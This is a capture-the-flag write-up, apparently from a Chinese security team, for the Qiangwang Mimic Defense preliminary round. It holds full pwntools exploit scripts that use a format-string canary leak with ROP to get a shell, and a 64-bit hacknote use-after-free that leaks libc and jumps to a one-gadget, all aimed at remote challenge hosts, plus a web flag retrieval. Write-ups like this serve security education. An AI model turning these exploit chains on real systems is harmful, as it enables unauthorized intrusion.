f1agdeb355a8b42ef5a9ea4ez8

06

MIMIC

1

pwn1

Use the format string to leak the canary, then ROP.

    #!/usr/bin/env python
    #coding=utf-8
    from pwn import *
    p = remote("172.51.243.90", 9999)
    #p = process('./pwn1')
    context.log_level = 'debug'
    elf = ELF('./pwn1')
    #gdb.attach(p, "b main")
    p.recvuntil(b'something\n')
    p.sendline(b'1')
    p.recvuntil(b'0x')
    pie = int(p.recv(12), 16) - 0xa94
    log.info("pie==>" + hex(pie))
    binsh = 0x0000000000202068 + pie
    system = 0xa2c + pie
    pop_rdi = 0xc73 + pie

    p.sendline(b'2')
    p.send(b"%33$p")
    p.recvuntil(b'0x')
    canary = int(p.recv(16), 16)
    log.info("canary==>" + hex(canary))
    payload = b'a'*0xc8 + p64(canary) + p64(0xdeadbeef) + p64(pop_rdi) + p64(binsh) + p64(system)
    p.send(payload)
    p.interactive()

2

pwn1-1

Not much different from pwn1; the vulnerability is the same, but here getting a shell requires setting rdx to 0.

    #!/usr/bin/env python
    #coding=utf-8
    from pwn import *
    p = remote("172.51.243.208", 9999)
    #p = process('./pwn1-1')
    context.log_level = 'debug'
    #gdb.attach(p, "b *$rebase(0x00000000000014F4)")
    p.recvuntil(b'Welcome to mimic world,try something\n')
    p.sendline(b'1')
    p.recvuntil(b'0x')
    pie = int(p.recv(12), 16) - 0x12a0
    log.info("pie==>" + hex(pie))
    binsh = 0x0000000000004050 + pie
    system = 0x00000000000011A2 + pie
    pop_rdi = 0x0000000000001943 + pie
    pp_ret = 0x0000000000001941 + pie
    bss = 0x0000000000004060 + pie
    ret = 0x000000000000101a + pie
    x_bss = 0x000000000000406C + pie

    p.sendline(b'2')
    p.recvuntil(b"hello\n")
    payload = b'a' + b'%9$hnna' + p64(x_bss)
    p.send(payload)
    sleep(2)
    payload2 = b'\x00'*0xe8 + p64(bss) + p64(0) + p64(ret) + p64(pop_rdi) + p64(binsh) + p64(pp_ret) + p64(0)*2 + p64(system)
    p.send(payload2)
    # p.send(payload2)
    p.interactive()

3

pwn2-1

A reused challenge: hacknote changed to 64-bit, but the approach is the same.

    #!/usr/bin/env python
    #coding=utf-8
    from pwn import *
    context(arch = 'amd64',os = 'linux',log_level = 'debug')
    elf = ELF('pwn2-1')
    libc = ELF('/lib/x86_64-linux-gnu/libc-2.31.so')
    DEBUG = 0
    if DEBUG:
        #libc = ELF("/home/shoucheng/tools/glibc-all-in-one/libs/2.27-3ubuntu1.6_amd64/libc-2.27.so")
        #ld = ELF("/home/shoucheng/tools/glibc-all-in-one/libs/2.27-3ubuntu1.6_amd64/ld-2.27.so")
        #p = process(argv=[ld.path,elf.path], env={"LD_PRELOAD" : libc.path})
        p = process('./pwn2-1')
    else:
        ip = '172.51.243.104'
        port = 9999
        #libc = ELF("./libc.so.6")
        p = remote(ip, port)

    def debug(info="b main"):
        #gdb.attach(p, info)
        gdb.attach(p, "b *$rebase(0x0000000000001B0A)")

    def add(size,content):
        p.sendlineafter('choice :', b'1')
        p.sendlineafter('Note size :',str(size).encode("ascii"))
        p.sendafter('Content :',content)

    def free(idx):
        p.sendlineafter('choice :', b'2')
        p.sendlineafter('Index :',str(idx).encode("ascii"))

    def show(idx):
        p.sendlineafter('choice :', b'3')
        p.sendlineafter('Index :',str(idx).encode("ascii"))

    #debug()
    p.sendlineafter(b"Your choice :", b'5')
    p.recvuntil(b'0x')
    pie = int(p.recv(12), 16) - 0x11f0
    puts = pie + 0x11d0
    log.info("pie==>0x%x" %pie)
    sys = 0x0000000000001BF2 + pie
    add(0x20, b'a')
    add(0x20, b'a')
    free(0)
    free(1)
    add(0x10, p64(puts) + p64(elf.got['puts'] + pie))
    show(0)
    leak = u64(p.recv(6).ljust(8, b'\x00')) - libc.sym['puts']
    log.info("libc==>0x%x" %leak)
    ogg = leak + 0xe3b01
    free(2)
    add(0x10, p64(ogg))
    show(0)
    p.interactive()

4

webmimic

3dbde697d71690a769204beb12283678
cmd5 decrypts this to 123. After testing again and again: DES decryption.

http://172.51.243.8:804/mimic_storage
request url is  /mimic_storage
random is668308459
http://172.51.243.8:804/getflag?sec=668308459&path=bAzlsD1ChiFW5eMC5tUokHErPkdjqARE
request url is  /getflag
flag{7t5oKH9rb8t7L1LaZwRtEvJRMaoY2aGm}

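Originally published on the WeChat official account EDI安全 (EDI Security): The 5th "Qiangwang" (强网) Mimic Defense International Elite Challenge, Preliminary Round: WriteUp By EDISEC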
